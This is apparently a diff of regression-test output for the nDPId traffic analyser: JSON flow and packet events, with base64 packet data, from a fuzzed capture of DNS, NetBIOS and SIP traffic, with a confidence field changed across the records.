-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1120469683449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469683449,"pkt":"ADBUADRWAODtAW69CABFAABIYdEAAIARTYDAqAECwKgBAQqkADUANFNK1tYBAAABAAAAAAAABF9zaXAGX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAQE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469685131,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1120469685131,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469685131,"pkt":"\/\/\/\/\/\/\/\/AOB2AW69CABFAABOadMAAIARTHrAqAECwKgB\/wCJY4kAOls4hPQBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUN1NEFDQUJNAHEgAAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1120469685452,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469685452,"pkt":"ADBUPzRWAODtAW69CABFAABIadQAAIARTX3AqAECwKgRAQqkADUANFNK1tYBAAABAAAAAAAABF96aXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1120469689458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469689458,"pkt":"ADBUADRWAODtAW69CABFAABIadYAAIARXXvAqAECwKgBAQqkADUANFNK1tYBAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1120469697460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469697460,"pkt":"ADBUADRWAODtAW69CABFAABEadcAAIARTX7AqAECwKgBAQqlADUAMORCQNcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1120469697462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469697462,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqUAR8a+QNeAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAxWAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1120469697466,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469697466,"pkt":"ADBUADRWAODtAW69CABFAAA+adiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1120469697468,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469697468,"pkt":"AODtAW69ADBUADRWCABFAABOAABAAEARt0vAqAEuwKgBAgA1CqYAOqrT7deBAAABAAEAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQAAJxAABNTyISM="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":499,"global_ts_msec":1120469697621} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":533,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":533,"pkt_l4_len":0,"thread_ts_msec":1120469697469,"pkt":"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"} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469540839,"flow_last_seen":1120469733221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469540839,"flow_last_seen":1120469733221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 